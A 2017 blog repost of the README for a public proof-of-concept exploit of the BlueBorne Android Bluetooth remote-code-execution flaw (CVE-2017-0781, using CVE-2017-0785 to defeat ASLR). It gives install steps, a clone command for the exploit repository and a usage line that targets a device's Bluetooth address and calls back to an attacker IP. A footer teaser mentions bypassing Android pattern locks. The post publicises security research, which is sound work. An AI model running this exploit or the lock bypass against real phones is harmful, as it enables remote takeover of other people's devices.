Saturday, 16 December 2017

blueborne: BlueBorne Android Exploit PoC

blueborne: BlueBorne Android Exploit PoC
BlueBorne Android Exploit PoC
This repository contains a PoC code of BlueBorne’s Android RCE vulnerability (CVE-2017-0781). It also uses the SDP Information leak vulnerability (CVE-2017-0785) to bypass ASLR. It achieves code execution on a Google Pixel Android smartphone running version 7.1.2 with Security Patch Level July or August 2017. This code can also be altered a bit in order to target other Android smartphones.
All code can be found under android dir.
For more details you may read the full technical white paper available here:
In addition, a detailed blog post on the exploitation of this vulnerability is available here: https://www.armis.com/blueborne-on-android-exploiting-rce-over-the-air/
Install
sudo apt-get install libbluetooth-dev
sudo pip2 install pybluez pwn
git clone https://github.com/ArmisSecurity/blueborne.git

Usage
sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>
IP needs to be accessible from the victim (should be the IP of the machine that runs the exploit)

Demo
https://youtu.be/Az-l90RCns8
Source: https://gith ub.com/ArmisSecurity/blueborne

-

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

How To Bypass Android Pattern Lock With/Without Root

METHOD I Solution With Recovery (Cwm, Twrp, Xrec,Etc…) Installed: INSTRUCTIONS: Download this zip Pattern Password Disable (Download...